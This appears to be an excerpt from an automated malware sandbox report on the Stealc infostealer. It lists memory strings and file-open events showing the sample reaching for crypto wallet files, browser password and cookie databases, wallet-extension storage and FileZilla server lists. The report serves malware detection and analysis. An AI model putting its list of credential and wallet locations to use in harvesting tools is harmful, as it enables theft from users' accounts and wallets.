Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
